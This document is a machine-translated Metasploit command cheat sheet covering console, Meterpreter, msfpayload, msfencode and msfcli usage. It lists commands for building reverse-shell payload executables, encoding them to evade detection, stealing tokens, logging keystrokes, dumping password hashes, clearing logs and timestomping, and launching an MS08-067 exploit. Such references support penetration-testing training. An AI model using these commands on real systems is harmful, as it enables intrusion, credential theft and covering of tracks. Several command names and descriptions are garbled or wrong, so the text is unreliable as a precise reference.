Metasploit (MSF) terminal commands Daquan

Show exploits

Lists all penetration attack modules in the Metasploit framework.
Show payloads

Lists all attack payloads in the Metasploit framework.
Show Auxiliary

Lists all the secondary attack payloads in the Metasploit framework.
Search Name

Find all the infiltration attacks and other modules in the Metasploit framework.
Info

Displays information about the development of penetration attacks or modules.
Use name

Load a penetration attack or module.
Lhost

You can have the IP address of the destination host connected locally, usually when the target host is not in the same LAN, it needs to be a public IP address, especially for the rebound shell use.
RHOST

Remote host or target host.
Set function

Set specific configuration parameters (EG: Set local or remote host parameters).
SETG function

Set specific configuration parameters globally (EG: Set local or remote host parameters).
Show options

Lists all the configuration parameters in a penetration attack or module.
Show targets

Lists all supported target platforms for penetration attacks.
Set Target num

Specify the operating system and patch version type of the target you know.
Set payload Name

Specifies the attack payload you want to use.
Show advanced

Lists all advanced configuration options.
Set Autorunscript migrate-f.

After the infiltration attack is complete, it is automatically migrated to another process.
Check

Detects if the target has a corresponding security vulnerability in the selected penetration attack.
Exploit

Perform a penetration attack or module to attack the target.
Exploit-j

A infiltration attack under a scheduled task (the attack will take place in the background).
Exploit-z

The infiltration attack does not interact with the reply after it is completed.
EXPLOIT-E Encoder

Develop the attack load coding method used (Eg:exploit-e Shikata_ga_nai).
Exploit-h

Lists the help information for the exploit command.
Sessions-l

Lists the available interactive sessions (used when working with multiple shells).
Sessions-l-V

Lists all available interactive sessions and details, EG: Which security vulnerability was used to attack the system.
Sessions-s Script

Run a specific Metasploit script in all active Metasploit sessions.
Sessions-k

Kills all active interactive sessions.
Sessions-c cmd

Executes a command on all active Metasploit sessions.
Sessions-u SessionID

Upgrade a normal Win32 Shell to the Metasploit shell.
Db_create Name

Create a database (Eg:db_create autopwn) to be used by a database-driven attack.
Db_connect Name

Create and connect a database (Eg:db_connect user:[email protected]/sqlname) to be used by a database-driven attack.
Db_namp

Use Nmap and store the scanned data in the database (support common NMAP statements, eg:-st-v-p0).
Db_autopwn-h

Displays the help information for the DB_AUTOPWN command.
Db_autopwn-p-R-E

Perform db_autopwn on all discovered open ports, attack all systems, and use a bounce shell.
Db_destroy

Deletes the current database.
Db_destroy User:[email protected]: port/database

Use the advanced option to delete the database.
Metasploit Command * * *

Help

Open Meterpreter use Help.
Run ScriptName

Run the Meterpreter script, and in the Scripts/meterpreter directory, you can view all the script names.
SysInfo

Lists system information for the managed host.
Ls

Lists the file and folder information for the destination host.
Use Priv

Load the elevation of Privilege extension module to extend the Metasploit library.
Ps

Displays all running processes and associated user accounts.
Migrate PID

Migrates to a specified process ID (PID number can be obtained from the host via the PS command).
Use Incognito

Load Incognito function (used to steal the target host's token or impersonate the user)
List_tokens-u

Lists the available tokens for the target host user.
List_tokens-g

Lists the available tokens for the target host user group.
Impersonate_token Domain_name\username

Impersonate a token that is available on the target host.
Steal_token PID

Steals the available tokens for a given process and makes a token impersonation.
Drop_token

Stop impersonating the current token.
Getsystem

Use various attack vectors to elevate system user privileges.
Execute-f Cmd.exe-i

Executes the Cmd.exe command and interacts.
Execute-f Cmd.exe-i-T

Executes the cmd command with all available tokens and hides the process.
Rev2self

Back to the initial user account that controls the target host.
Reg command

Interact, create, delete, query, and so on in the target host registry.
Setdesktop number

Switch to another user interface (the feature is based on those users who are logged on).
Screenshot

To the screen of the target host.
Upload file

Uploads a file to the target host.
Download file

Download the file from the target host.
Keyscan_start

Turn on keylogger for remote target host.
Keyscan_dump

Stores the keylogger captured on the target host.
Keyscan_stop

Stops the keylogger for the target host.
Getprivs

Get the privileges on the target host as much as possible.
Uictl Enable Keyboard/mouse

Take over the target host's keyboard and mouse.
Background

Turn your current Metasploit shell into a background execution.
Hashdump

Export the password hash value in the destination host.
Use sniffer

Load sniffer mode.
Sniffer_interfaces

Lists all open network ports for the target host.
Sniffer_dump InterfaceID Pcapname

Start sniffing on the target host.
Sniffer_start InterfaceID Packet-buffer

Initiates a sniffer on the target host for a specific range of packet buffers.
Sniffer_stats InterfaceID

Gets the statistics that are implementing the sniffer network interface.
Sniffer_stop InterfaceID

Stop sniffing.
Add_user username password-h IP

Add a user on the remote destination host.
Clearev

Clear the log records on the target host.
Timestomp

Modify file properties, such as modifying the creation time of a file (anti-forensics investigation).
Reboot

Restart the target host.
Msfpayload Command * * *

Msfpayload-h

Msfpayload's help information.
Msfpayload windows/meterpreter/bind_tcp O

Lists the configuration items for the attack payload available under all WINDOWS/METERPRETER/BIND_TCP (any attack payload is available for configuration).
Msfpayload windows/meterpreter/reverse_tcp lhost=ip lport=port X > Payload.exe

Create a Metasploit reverse_tcp attack payload, back to the lport of Lhostip, and save it as a Windows executable program named Payload.exe.
Msfpayload windows/meterpreter/reverse_tcp lhost=ip lport=port R > Payload.raw

Create a Metasploit reverse_tcp attack payload, back to the lport of Lhostip, and save it as Payload.raw, which is named after the file, used in Msffencode.
Msfpayload windows/meterpreter/reverse_tcp lport=port C > PAYLOAD.C

Create a Metasploit reverse_tcp attack payload and export the C format shellcode.
Msfpayload windows/meterpreter/reverse_tcp lport=port J > Payload.java

Create a Metasploit reverse_tcp attack payload and export it as a JavaScript language string in%u encoding.
Msfencode Command * * *

Mefencode-h

Lists the help commands for Msfencode.
Msfencode-l

Lists all the available encoders.
Msfencode-t (C,elf,exe,java,is_le,js_be,perl,raw,ruby,vba,vbs,loop_vbs,asp,war,macho)

Displays the format of the encoded buffer.
Msfencode-i payload.raw-o encoded_payload.exe-e x86/shikata_ga_nai-c 5-t exe

Use the Shikata_ga_nai encoder to encode the Payload.raw file 5, and then export a file named Encoded_payload.exe.
Msfpayload windows/meterpreter/bind_tcp Lport=port R | MSFENCODE-E x86/_countdown-c 5-t Raw | Msfencode-e x86/shikata_ga_nai-c 5-t Exe-o Multi-encoded_payload.exe

Creates an attack payload that is nested encoded in multiple encoded formats.
Msfencode-i Payload.raw bufferregister=esi-e x86/alpja_mixed-t C

Create a pure alphanumeric shellcode that is only shellcode by the ESI register and output in the C language format.
MSFCLI Command * * *

MSFCLI | grep exploit

Only the penetration attack module is listed.
MSFCLI | grep exploit/windows

Lists only the penetration attack modules associated with Windows.
MSFCLI exploit/windows/smb/ms08_067_netapi payload=windows/meterpreter/bind_tcp LPORT=PORT RHOST=IP E

The IP initiates a MS08_067_NETAPI penetration attack, configures the BIND_TCP attack payload, and binds to the port ports for monitoring.

Metasploit (MSF) terminal commands Daquan